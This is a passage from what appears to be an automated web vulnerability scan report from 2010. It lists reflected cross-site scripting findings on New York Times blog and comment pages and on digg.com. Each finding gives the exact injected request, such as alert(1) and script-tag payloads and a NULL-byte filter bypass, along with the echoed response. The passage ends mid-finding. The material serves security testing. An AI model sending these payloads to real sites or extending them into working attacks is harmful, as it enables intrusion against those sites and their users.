<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments742aa'-alert(1)-'d3686b770d1'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b9"><a>40112219a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70874
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink ...[SNIP]...
3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37048"><a>fe7fd4940f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33545
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Botto ...[SNIP]...
3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7977"-alert(1)-"f6aef8543a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70362
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... = "nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143071"; var s_pagename = "2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef09a"><a>6c6cf61beb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 114608
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom ...[SNIP]...
3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd94'-alert(1)-'3641936aba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments2dd94'-alert(1)-'3641936aba3/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 114345
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments2dd94'-alert(1)-'3641936aba3'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53310"><a>4fd6753484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 32847
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,Inv1,Inv2,In ...[SNIP]...
3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66476"-alert(1)-"d2cc1166fce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 104936
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... r s_account = "nytimesglobal,nytopinionator"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "289_69231"; var s_pagename = "2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1"; var s_channel = "opinionator"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd9c'-alert(1)-'4a279ffe4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments8cd9c'-alert(1)-'4a279ffe4c1/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 78663
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments8cd9c'-alert(1)-'4a279ffe4c1'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623d"><a>3466d5f58ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 78729
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S ...[SNIP]...
3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47de7"><a>818b9e1e4e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33885
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott ...[SNIP]...
3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a953"-alert(1)-"fd6c09b8e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 74294
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... imesglobal,nytwheels"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "29_75697"; var s_pagename = "2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1"; var s_channel = "wheels"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dealbook.nytimes.com
Path: /2010/11/12/the-acquisition-of-tina-brown/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9cd7"><script>alert(1)</script>bd807b33336 was submitted in the src parameter. This input was echoed as c9cd7\"><script>alert(1)</script>bd807b33336 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-acquisition-of-tina-brown/?src=twrc9cd7"><script>alert(1)</script>bd807b33336 HTTP/1.1 Host: dealbook.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://dealbook.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... +Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;barry-diller;iacinteractivecorp;media;newsweek;sidney-harman;the-daily-beast;tina-brown;top-headline-2&src=twrc9cd7\"><script>alert(1)</script>bd807b33336"> ...[SNIP]...
3.126. http://digg.com/remote-submit [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://digg.com
Path: /remote-submit
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b3e90"><script>alert(1)</script>9fa78c401ad was submitted in the REST URL parameter 1. This input was echoed as b3e90"><script>alert(1)</script>9fa78c401ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:25 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Set-Cookie: traffic_control=1943021764233658561%3A135; expires=Mon, 13-Dec-2010 02:02:25 GMT; path=/; domain=digg.com Set-Cookie: d=aa91bb711c6bbb8366e494de8d7a0a35ee8a25c84136f625861f0473a8a6194c; expires=Thu, 12-Nov-2020 12:10:05 GMT; path=/; domain=.digg.com X-Digg-Time: D=277115 10.2.129.225 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15225
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad.rss"> ...[SNIP]...
3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dinersjournal.blogs.nytimes.com
Path: /2010/11/12/using-root-vegetables-raw/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f91"><script>alert(1)</script>f1e4b0bb863 was submitted in the src parameter. This input was echoed as f0f91\"><script>alert(1)</script>f1e4b0bb863 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/using-root-vegetables-raw/?src=twrf0f91"><script>alert(1)</script>f1e4b0bb863 HTTP/1.1 Host: dinersjournal.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://dinersjournal.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eviews;Cooking;Eating;Wine;Restaurants;Recipes;Dining;Sifton;Bittman;Asimov;New+York;Bruni;The+New+York+Times;beets;brussels-sprouts;butternut-squash;cooking;general;home-cooking;the-minimalist&src=twrf0f91\"><script>alert(1)</script>f1e4b0bb863"> ...[SNIP]...
3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://economix.blogs.nytimes.com
Path: /2010/11/12/a-high-water-mark-for-profits/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce27"><script>alert(1)</script>67611b927bc was submitted in the src parameter. This input was echoed as 3ce27\"><script>alert(1)</script>67611b927bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/a-high-water-mark-for-profits/?src=twr3ce27"><script>alert(1)</script>67611b927bc HTTP/1.1 Host: economix.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://economix.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... MNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Economics;Economy;Economics+Policy;Economics+Reports;Business;corporate-profits;forecasts;joseph-a-lavorgna;unemployment&src=twr3ce27\"><script>alert(1)</script>67611b927bc"> ...[SNIP]...
3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frugaltraveler.blogs.nytimes.com
Path: /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df23"><script>alert(1)</script>267493e97ac was submitted in the src parameter. This input was echoed as 6df23\"><script>alert(1)</script>267493e97ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/?src=mv6df23"><script>alert(1)</script>267493e97ac&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
